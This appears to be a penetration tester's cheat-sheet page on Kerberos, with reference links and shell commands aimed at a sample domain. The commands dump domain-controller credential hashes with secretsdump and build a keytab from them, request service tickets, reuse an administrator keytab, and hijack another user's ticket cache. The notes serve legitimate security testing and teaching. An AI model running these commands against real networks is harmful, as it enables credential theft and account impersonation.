- https://www.roguelynn.com/words/explain-like-im-5-kerberos/
- https://vbscrub.com/2020/05/13/kerberos-protocol-explained/
- https://www.tarlogic.com/en/blog/how-kerberos-works/
- https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://habr.com/ru/company/tomhunter/blog/507140/
- https://habr.com/ru/company/tomhunter/blog/509290/
- https://ardent101.github.io/posts/kerberos_theory/
- https://ardent101.github.io/posts/kerberos_general_attacks/
- https://habr.com/ru/articles/803163/
{% embed url="https://youtu.be/qZPvgoUzCdI" %}
Using ntpdate:
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
Using faketime:
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
- https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/
- https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7
{% code title="keytab.sh" %}
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out
# ---
cat secretsdump.out | grep aad3b435 | awk -F: '{print " (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print " (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt{% endcode %}
- https://github.com/OtterHacker/Cerbere
- https://xakep.ru/2023/04/04/no-mimikatz/
- https://github.com/MzHmO/articles/tree/main/Ticket%20Injector
- https://github.com/MzHmO/PowershellKerberos
Check KRB5CCNAME environment variable contents:
$ env | grep KRB5
Request TGT supplying password:
$ kinit
$ klist
List available SPNs:
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "[email protected]" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
Request TGS for MSSQL service:
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
Re-using keytab files to load and renew a TGT:
$ kinit [email protected] -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
Re-using ccache files:
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCACHE=/tmp/krb5cc_31337
$ klist
- https://tishina.in/ops/freeipa-postexploitation
- https://habr.com/ru/companies/rvision/articles/825086/
A blog series by @n0pe_sled on attacking FreeIPA: